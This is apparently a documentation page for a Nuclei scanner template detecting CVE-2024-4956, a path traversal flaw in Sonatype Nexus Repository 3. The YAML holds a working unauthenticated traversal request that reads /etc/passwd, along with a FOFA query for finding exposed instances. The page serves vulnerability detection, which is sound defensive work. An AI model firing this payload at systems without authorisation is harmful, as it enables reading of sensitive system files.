Sonatype Nexus Repository Manager 3 - Local File Inclusion
ID: CVE-2024-4956
Severity: high
Author: ritikchaddha
Tags: cve,cve2024,nexus,lfi,sonatype
Description
Section titled “Description”Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
YAML Source
Section titled “YAML Source”id: CVE-2024-4956
info: name: Sonatype Nexus Repository Manager 3 - Local File Inclusion author: ritikchaddha severity: high description: | Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. reference: - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg - https://nvd.nist.gov/vuln/detail/CVE-2024-4956 - https://support.sonatype.com/hc/en-us/articles/29416509323923 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-4956 cwe-id: CWE-22 epss-score: 0.00044 epss-percentile: 0.10128 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: sonatype product: nexus fofa-query: - title="Nexus Repository Manager" - title="nexus repository manager" tags: cve,cve2024,nexus,lfi,sonatype
http: - method: GET path: - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers: - type: dsl dsl: - regex('root:.*:0:0:', body) - contains(header, "application/octet-stream") - status_code == 200 condition: and# digest: 490a004630440220216ee570556bd4cdafe44cc6513af8e04f00921e6855c1536224fd55a4623a5002207cd91a9d51f9b68875615c459f4044cf8fd77a5be905d94549e11088418e15e6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4956.yaml"